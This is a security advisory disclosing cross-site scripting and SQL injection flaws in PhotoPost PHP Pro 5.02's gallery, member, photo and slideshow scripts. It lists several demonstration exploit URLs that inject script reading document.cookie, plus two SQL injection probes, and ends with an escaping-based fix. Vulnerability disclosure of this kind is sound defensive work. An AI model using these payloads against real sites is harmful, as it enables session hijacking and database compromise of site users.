PhotoPost PHP Pro 'showgallery.php', 'showmembers.php', 'showphoto.php', and 'slideshow.php' Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013581
SecurityTracker URL:  http://securitytracker.com/id/1013581
CVE Reference:   CVE-2005-0928, CVE-2005-0929   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Mar 28 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes
Version(s): 5.02
Description:   Diabolic Crab reported some input validation vulnerabilities in PhotoPost PHP Pro. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The 'showgallery.php', 'showmembers.php', and 'slideshow.php' scripts do not properly validate user-supplied data in various fields. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PhotoPost PHP Pro software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/photos/showgallery.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/photos/showgallery.php?si=&sort=1&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=

http://[target]/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=

http://[target]/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=

http://[target]/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser=

http://[target]/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bpassword=&%3bsort=1&%3bcat=502

The 'showmembers.php' and 'showphoto.php' scripts do not properly validate user-supplied input. A remote user may be able to supply a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/photos/showmembers.php?sl='SQL_INJECTION

http://[target]/photos/showphoto.php?photo='SQL_ERROR

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PhotoPost PHP Pro software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation
before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
